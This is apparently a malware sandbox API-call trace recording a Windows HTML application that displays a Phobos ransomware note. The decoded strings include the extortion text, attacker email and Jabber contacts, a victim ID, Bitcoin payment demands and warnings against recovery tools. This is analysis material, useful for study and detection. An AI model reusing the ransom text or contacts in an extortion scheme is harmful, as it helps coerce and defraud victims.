0xe [0230.603] IUnknown:Release (This=0x5bbf0c) returned 0xd [0230.721] CoCreateInstance (in: rclsid=0x74102bc0*(Data1=0x3c374a40, Data2=0xbae4, Data3=0x11cf, Data4=([0]=0xbf, [1]=0x7d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x69, [6]=0x46, [7]=0xee)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74093cb0*(Data1=0x3c374a41, Data2=0xbae4, Data3=0x11cf, Data4=([0]=0xbf, [1]=0x7d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x69, [6]=0x46, [7]=0xee)), ppv=0x5c1cfc | out: ppv=0x5c1cfc*=0x6248b8) returned 0x0 [0231.021] IUnknown:QueryInterface (in: This=0x6248b8, riid=0x74157ac0*(Data1=0xcd040b2, Data2=0x39ba, Data3=0x4cdf, Data4=([0]=0x96, [1]=0xcf, [2]=0xc1, [3]=0x92, [4]=0x9d, [5]=0x3b, [6]=0x98, [7]=0x98)), ppvObject=0x1ee61c | out: ppvObject=0x1ee61c*=0x6248b8) returned 0x0 [0231.947] IUnknown:Release (This=0x6248b8) returned 0x2 [0231.947] IUnknown:Release (This=0x5bd5d4) returned 0x4 [0231.947] IUnknown:Release (This=0x5bd5d4) returned 0x3 [0231.947] IsOS (dwOS=0x25) returned 1 [0231.947] GetSysColor (nIndex=26) returned 0xcc6600 [0231.947] LsSetDoc () returned 0x0 [0231.948] LsCreateLine () returned 0x0 [0231.948] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0231.949] LsQueryLineDup () returned 0x0 [0231.949] LsDestroyLine () returned 0x0 [0231.949] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0231.949] LsSetDoc () returned 0x0 [0231.949] LsCreateLine () returned 0x0 [0231.949] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0231.950] LsQueryLineDup () returned 0x0 [0231.950] LsDestroyLine () returned 0x0 [0231.950] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0231.950] CreateUri (in: pwzURI="http://www.coindesk.com/information/how-can-i-buy-bitcoins/", dwFlags=0x2b81, dwReserved=0x0, ppURI=0x1ee60c | out: ppURI=0x1ee60c*=0x626cbc) returned 0x0 [0231.950] ParseURLW (in: pcszURL="file:///C:/info.hta", ppu=0x1ee520 | out: ppu=0x1ee520) returned 0x0 [0231.950] CreateUri (in: pwzURI="file:///C:/info.hta", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x1ee5dc | out: ppURI=0x1ee5dc*=0x5bbf0c) returned 0x0 [0231.950] IUnknown:QueryInterface (in: This=0x5bbf0c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ee5a4 | out: ppvObject=0x1ee5a4*=0x5bbf0c) returned 0x0 [0231.950] IUnknown:Release (This=0x5bbf0c) returned 0xe [0231.950] IUnknown:AddRef (This=0x5bbf0c) returned 0xf [0231.950] CoInternetCombineIUri (in: pBaseUri=0x5bbf0c, pRelativeUri=0x626cbc, dwCombineFlags=0x6000000, ppCombinedUri=0x1ee610, dwReserved=0x0 | out: ppCombinedUri=0x1ee610*=0x626cbc) returned 0x0 [0231.950] IUnknown:Release (This=0x5bbf0c) returned 0xf [0231.950] IUnknown:Release (This=0x5bbf0c) returned 0xe [0231.950] IUnknown:QueryInterface (in: This=0x6248b8, riid=0x74157ac0*(Data1=0xcd040b2, Data2=0x39ba, Data3=0x4cdf, Data4=([0]=0x96, [1]=0xcf, [2]=0xc1, [3]=0x92, [4]=0x9d, [5]=0x3b, [6]=0x98, [7]=0x98)), ppvObject=0x1ee61c | out: ppvObject=0x1ee61c*=0x6248b8) returned 0x0 [0231.951] IUnknown:Release (This=0x6248b8) returned 0x2 [0231.951] IUnknown:Release (This=0x626cbc) returned 0x4 [0231.951] IUnknown:Release (This=0x626cbc) returned 0x3 [0231.951] IsOS (dwOS=0x25) returned 1 [0231.951] GetSysColor (nIndex=26) returned 0xcc6600 [0231.951] LsSetDoc () returned 0x0 [0231.951] LsCreateLine () returned 0x0 [0231.951] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0231.952] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2e4) returned 0x6294a0 [0231.953] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x194) returned 0x622d08 [0231.953] LsQueryLineDup () returned 0x0 [0231.953] LsDestroyLine () returned 0x0 [0231.953] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0231.953] LsSetDoc () returned 0x0 [0231.953] LsCreateLine () returned 0x0 [0231.953] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0231.953] LsQueryLineDup () returned 0x0 [0231.954] LsDestroyLine () returned 0x0 [0231.954] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0231.954] LsSetDoc () returned 0x0 [0231.954] LsCreateLine () returned 0x0 [0231.954] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0231.954] LsQueryLineDup () returned 0x0 [0231.954] LsDestroyLine () returned 0x0 [0231.954] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.190] GetOutlineTextMetricsW (in: hdc=0x80106e7, cjCopy=0xd8, potm=0x1ee4f8 | out: potm=0x1ee4f8) returned 0xd8 [0232.376] SelectObject (hdc=0x80106e7, h=0x18a002e) returned 0x50a072a [0232.376] SelectObject (hdc=0x80106e7, h=0x50a072a) returned 0x18a002e [0232.376] GetTextFaceW (in: hdc=0x80106e7, c=32, lpName=0x1ee748 | out: lpName="Wingdings") returned 10 [0232.376] SelectObject (hdc=0x80106e7, h=0x18a002e) returned 0x50a072a [0232.512] LsSetDoc () returned 0x0 [0232.512] LsCreateLine () returned 0x0 [0232.512] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.512] LsQueryLineDup () returned 0x0 [0232.512] LsDestroyLine () returned 0x0 [0232.512] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.513] LsSetDoc () returned 0x0 [0232.513] LsCreateLine () returned 0x0 [0232.513] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.513] LsQueryLineDup () returned 0x0 [0232.513] LsDestroyLine () returned 0x0 [0232.513] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.513] LsSetDoc () returned 0x0 [0232.513] LsCreateLine () returned 0x0 [0232.513] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.514] LsQueryLineDup () returned 0x0 [0232.514] LsDestroyLine () returned 0x0 [0232.514] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.514] LsSetDoc () returned 0x0 [0232.514] LsCreateLine () returned 0x0 [0232.514] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.515] LsQueryLineDup () returned 0x0 [0232.515] LsDestroyLine () returned 0x0 [0232.515] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.515] LsSetDoc () returned 0x0 [0232.515] LsCreateLine () returned 0x0 [0232.515] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.516] LsQueryLineDup () returned 0x0 [0232.516] LsDestroyLine () returned 0x0 [0232.516] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.516] LsSetDoc () returned 0x0 [0232.516] LsCreateLine () returned 0x0 [0232.516] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.517] LsQueryLineDup () returned 0x0 [0232.517] LsDestroyLine () returned 0x0 [0232.517] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.517] LsSetDoc () returned 0x0 [0232.517] LsCreateLine () returned 0x0 [0232.517] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.518] LsQueryLineDup () returned 0x0 [0232.518] LsDestroyLine () returned 0x0 [0232.518] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.518] LsSetDoc () returned 0x0 [0232.518] LsCreateLine () returned 0x0 [0232.518] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.518] LsQueryLineDup () returned 0x0 [0232.519] LsDestroyLine () returned 0x0 [0232.519] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.519] LsSetDoc () returned 0x0 [0232.519] LsCreateLine () returned 0x0 [0232.519] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.519] LsQueryLineDup () returned 0x0 [0232.519] LsDestroyLine () returned 0x0 [0232.519] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.519] LsSetDoc () returned 0x0 [0232.519] LsCreateLine () returned 0x0 [0232.519] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.520] LsQueryLineDup () returned 0x0 [0232.521] LsDestroyLine () returned 0x0 [0232.521] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.521] LsSetDoc () returned 0x0 [0232.521] LsCreateLine () returned 0x0 [0232.521] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.521] LsQueryLineDup () returned 0x0 [0232.521] LsDestroyLine () returned 0x0 [0232.521] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.521] LsSetDoc () returned 0x0 [0232.521] LsCreateLine () returned 0x0 [0232.521] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.522] LsQueryLineDup () returned 0x0 [0232.522] LsDestroyLine () returned 0x0 [0232.522] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.522] LsSetDoc () returned 0x0 [0232.522] LsCreateLine () returned 0x0 [0232.522] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.523] LsQueryLineDup () returned 0x0 [0232.523] LsDestroyLine () returned 0x0 [0232.523] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.523] LsSetDoc () returned 0x0 [0232.523] LsCreateLine () returned 0x0 [0232.523] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.524] CreateUri (in: pwzURI="https://www.youtube.com/results?search_query=pidgin+jabber+install", dwFlags=0x2b81, dwReserved=0x0, ppURI=0x1ee20c | out: ppURI=0x1ee20c*=0x626d94) returned 0x0 [0232.524] ParseURLW (in: pcszURL="file:///C:/info.hta", ppu=0x1ee120 | out: ppu=0x1ee120) returned 0x0 [0232.524] CreateUri (in: pwzURI="file:///C:/info.hta", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x1ee1dc | out: ppURI=0x1ee1dc*=0x5bbf0c) returned 0x0 [0232.524] IUnknown:QueryInterface (in: This=0x5bbf0c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ee1a4 | out: ppvObject=0x1ee1a4*=0x5bbf0c) returned 0x0 [0232.524] IUnknown:Release (This=0x5bbf0c) returned 0xf [0232.524] IUnknown:AddRef (This=0x5bbf0c) returned 0x10 [0232.524] CoInternetCombineIUri (in: pBaseUri=0x5bbf0c, pRelativeUri=0x626d94, dwCombineFlags=0x6000000, ppCombinedUri=0x1ee210, dwReserved=0x0 | out: ppCombinedUri=0x1ee210*=0x626d94) returned 0x0 [0232.525] IUnknown:Release (This=0x5bbf0c) returned 0x10 [0232.525] IUnknown:Release (This=0x5bbf0c) returned 0xf [0232.525] IUnknown:QueryInterface (in: This=0x6248b8, riid=0x74157ac0*(Data1=0xcd040b2, Data2=0x39ba, Data3=0x4cdf, Data4=([0]=0x96, [1]=0xcf, [2]=0xc1, [3]=0x92, [4]=0x9d, [5]=0x3b, [6]=0x98, [7]=0x98)), ppvObject=0x1ee21c | out: ppvObject=0x1ee21c*=0x6248b8) returned 0x0 [0232.525] IUnknown:Release (This=0x6248b8) returned 0x2 [0232.525] IUnknown:Release (This=0x626d94) returned 0x4 [0232.525] IUnknown:Release (This=0x626d94) returned 0x3 [0232.525] IsOS (dwOS=0x25) returned 1 [0232.525] GetSysColor (nIndex=26) returned 0xcc6600 [0232.525] LsQueryLineDup () returned 0x0 [0232.525] LsDestroyLine () returned 0x0 [0232.525] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.526] LsSetDoc () returned 0x0 [0232.526] LsCreateLine () returned 0x0 [0232.526] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.526] LsQueryLineDup () returned 0x0 [0232.526] LsDestroyLine () returned 0x0 [0232.526] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.526] LsSetDoc () returned 0x0 [0232.526] LsCreateLine () returned 0x0 [0232.526] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.526] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x18) returned 0x6057b8 [0232.526] LsSetDoc () returned 0x0 [0232.526] LsCreateLine () returned 0x0 [0232.526] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.527] LsQueryLineDup () returned 0x0 [0232.527] LsDestroyLine () returned 0x0 [0232.527] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.527] LsdnFinishRegular () returned 0x0 [0232.527] LsQueryLineDup () returned 0x0 [0232.527] LsQueryLineCpPpoint () returned 0x0 [0232.527] LsDestroyLine () returned 0x0 [0232.527] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x6057b8 | out: hHeap=0x590000) returned 1 [0232.527] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.527] LsSetDoc () returned 0x0 [0232.527] LsCreateLine () returned 0x0 [0232.527] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.528] LsQueryLineDup () returned 0x0 [0232.528] LsDestroyLine () returned 0x0 [0232.528] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.528] LsSetDoc () returned 0x0 [0232.528] LsCreateLine () returned 0x0 [0232.528] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.529] LsQueryLineDup () returned 0x0 [0232.529] LsDestroyLine () returned 0x0 [0232.529] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.529] LsSetDoc () returned 0x0 [0232.529] LsCreateLine () returned 0x0 [0232.529] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.530] LsQueryLineDup () returned 0x0 [0232.530] LsDestroyLine () returned 0x0 [0232.530] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.530] LsSetDoc () returned 0x0 [0232.530] LsCreateLine () returned 0x0 [0232.530] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.530] LsQueryLineDup () returned 0x0 [0232.530] LsDestroyLine () returned 0x0 [0232.530] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.530] LsSetDoc () returned 0x0 [0232.530] LsCreateLine () returned 0x0 [0232.530] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0232.530] LsQueryLineDup () returned 0x0 Thread: id = 229 os_tid = 0x6f0 Thread: id = 245 os_tid = 0x354 [0224.441] GetCurrentThreadId () returned 0x354 [0224.441] LoadLibraryW (lpLibFileName="mshtml.dll") returned 0x73f40000 [0224.441] CoInitialize (pvReserved=0x0) returned 0x0 [0224.441] GetTickCount () returned 0x201d4 [0224.441] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1006) returned 0x5d4c68 [0224.442] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5d32d0 | out: hHeap=0x590000) returned 1 [0224.442] IInternetProtocol:Read (in: This=0x5d1ef0, pv=0x5d4d30, cb=0xf38, pcbRead=0x248f73c | out: pv=0x5d4d30, pcbRead=0x248f73c*=0xf38) returned 0x0 [0224.442] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2006) returned 0x5d5c78 [0224.442] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x5d4c68, cbMultiByte=4096, lpWideCharStr=0x5d5c7c, cchWideChar=4096 | out: lpWideCharStr="\r\n\r\n \r\n \r\n phobos\r\n\r\n \r\n\r\n \r\n\r\n \r\n \r\n\r\n \r\n
    \r\n\x09\x09\r\n\x09\x09
    All your files have been encrypted!
    \r\n\x09
    \r\n
    All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail tedmundboardus@aol.com
    \x09
    Write this ID in the title of your message 9C354B42-0001
    \r\n\x09
    In case of no answer in 24 hours write us to this e-mail:tylecotebenji@aol.com
    \r\n\x09
    If there is no response from our mail, you can install the Jabber client and write to us in support of phobos_helper@xmpp.jp
    \r\n
    \r\n\x09\x09You have to pay for decryption in Bitcoins. The price d") returned 4096 [0224.442] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x108) returned 0x5d7c88 [0224.706] CoInitialize (pvReserved=0x0) returned 0x1 [0224.706] CoCreateInstance (in: rclsid=0x74090e58*(Data1=0x275c23e2, Data2=0x3747, Data3=0x11d0, Data4=([0]=0x9f, [1]=0xea, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3f, [6]=0x86, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74090e48*(Data1=0xdccfc164, Data2=0x2b38, Data3=0x11d2, Data4=([0]=0xb7, [1]=0xec, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x8f, [6]=0x5d, [7]=0x9a)), ppv=0x74479500 | out: ppv=0x74479500*=0x5cf700) returned 0x0 [0225.382] IUnknown:QueryInterface (in: This=0x5cf700, riid=0x74091170*(Data1=0x359f3441, Data2=0xbd4a, Data3=0x11d0, Data4=([0]=0xb1, [1]=0x88, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x38, [6]=0xc9, [7]=0x69)), ppvObject=0x74479504 | out: ppvObject=0x74479504*=0x5dd5e8) returned 0x0 [0225.382] IUnknown:QueryInterface (in: This=0x5cf700, riid=0x74091180*(Data1=0xdccfc162, Data2=0x2b38, Data3=0x11d2, Data4=([0]=0xb7, [1]=0xec, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x8f, [6]=0x5d, [7]=0x9a)), ppvObject=0x74479508 | out: ppvObject=0x74479508*=0x5d8368) returned 0x0 [0225.473] CoUninitialize () [0225.474] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76180000 [0225.474] GetProcAddress (hModule=0x76180000, lpProcName="GetThreadUILanguage") returned 0x761bcf14 [0225.474] GetThreadUILanguage () returned 0x2480409 [0225.474] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x15a54) returned 0x5eb070 [0225.700] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5eb070, Size=0x52ac) returned 0x5eb070 [0225.700] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x248f6a0 | out: lpCPInfo=0x248f6a0) returned 1 [0225.909] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x68) returned 0x603dc0 [0225.909] IUnknown:AddRef (This=0x5bbbac) returned 0xe [0225.910] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1a8) returned 0x5f0328 [0225.910] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x248f684 | out: lpCPInfo=0x248f684) returned 1 [0225.910] IUnknown:AddRef (This=0x5c5628) returned 0x4 [0225.910] IUnknown:AddRef (This=0x5bbbac) returned 0xf [0225.910] IUnknown:QueryInterface (in: This=0x5bbbac, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x248f68c | out: ppvObject=0x248f68c*=0x5bbbac) returned 0x0 [0225.910] IUnknown:Release (This=0x5bbbac) returned 0xf [0225.910] IUnknown:AddRef (This=0x5bbbac) returned 0x10 [0225.910] IUri:GetScheme (in: This=0x5bbbac, pdwScheme=0x248f690 | out: pdwScheme=0x248f690*=0x9) returned 0x0 [0225.910] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x8006) returned 0x5f04d8 [0225.910] IUnknown:Release (This=0x5bbbac) returned 0xf [0225.910] PostMessageW (hWnd=0x20168, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0225.911] GetTickCount () returned 0x20646 [0225.911] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1006) returned 0x5f84e8 [0225.911] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x4000) returned 0x5f94f8 [0225.911] IInternetProtocol:Read (in: This=0x5d1ef0, pv=0x5f9504, cb=0x1000, pcbRead=0x248f73c | out: pv=0x5f9504, pcbRead=0x248f73c*=0x1000) returned 0x0 [0225.928] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5f04d8, Size=0x3ee8) returned 0x5f04d8 [0225.928] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x5f84e8, cbMultiByte=4096, lpWideCharStr=0x5f23be, cchWideChar=4096 | out: lpWideCharStr="epends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.\r\n\x09
    \r\n\x09\r\n\x09
    \r\n
    Free decryption as guarantee
    \r\n\x09\x09
      Before paying you can send us up to 5 files for free decryption. The total size of files must be less than 10Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\x09
    \r\n
    \r\n\r\n
    \r\n
    How to obtain Bitcoins
    \r\n \r\n
    \r\n\x09
    Jabber client installation instructions:
    \r\n\x09
    \r\n\x09\x09
      \r\n\x09\x09\x09
    • Download the jabber (Pidgin) client from https://pidgin.im/download/windows/
      • \r\n\x09\x09\x09
    • After installation, the Pidgin client will prompt you to create a new account.
      • \r\n\x09\x09\x09
    • Click \"Add\"
    • In the \"Protocol\" field, select XMPP
      • \r\n\x09\x09\x09
    • In \"Username\" - come up with any name
      • \r\n\x09\x09\x09
    • In the field \"domain\" - enter any jabber-server, there are a lot of them, for example - exploit.im
      • \r\n\x09\x09\x09
    • Create a password
    • At the bottom, put a tick \"Create account\"
      • \r\n\x09\x09\x09
    • Click add
      • \r\n\x09\x09\x09
    • If you selected \"domain\" - exploit.im, then a new window should appear in which you will need to re-enter your data:
      • \r\n\x09\x09\x09
        \r\n\x09\x09\x09\x09
      • User
        • \r\n\x09\x09\x09\x09
      • password
        • \r\n\x09\x09\x09\x09
      • You will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below)
        • \r\n\x09\x09\x09
      \r\n\x09\x09\x09
    • If you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install
      • \r\n\x09\x09
    \r\n\x09
    \r\n
    \r\n
    Attention!
    \r\n
      \r\n
    • Do not rename encrypted files.
      • \r\n
    • Do not try to decrypt your data using third party software, it may cause permanent data loss.
      • \r\n
    • Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.
      • \r\n
    \r\n
    \r\n\x09
    \r\n\x09\x09\r\n\x09
    \r\n
  • In the \"Protocol\" field, select XMPP
    • \r\n\x09\x09\x09
  • In \"Username\" - come up with any name
    • \r\n\x09\x09\x09
  • In the field \"domain\" - enter any jabber-server, there are a lot of them, for example - exploit.im
    • \r\n\x09\x09\x09
  • Create a password
  • At the bottom, put a tick \"Create account\"
    • \r\n\x09\x09\x09
  • Click add
    • \r\n\x09\x09\x09
  • If you selected \"domain\" - exploit.im, then a new window should appear in which you will need to re-enter your data:
    • \r\n\x09\x09\x09
      \r\n\x09\x09\x09\x09
    • User
      • \r\n\x09\x09\x09\x09
    • password
      • \r\n\x09\x09\x09\x09
    • You will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below)
      • \r\n\x09\x09\x09
    \r\n\x09\x09\x09
  • If you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install
    • \r\n\x09\x09\r\n\x09
    \r\n
    \r\n
    Attention!
    \r\n
      \r\n
    • Do not rename encrypted files.
      • \r\n
    • Do not try to decrypt your data using third party software, it may cause permanent data loss.
      • \r\n
    • Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.
      • \r\n
    \r\n
    \r\n\x09
    \r\n\x09\x09\r\n\x09
    \r\n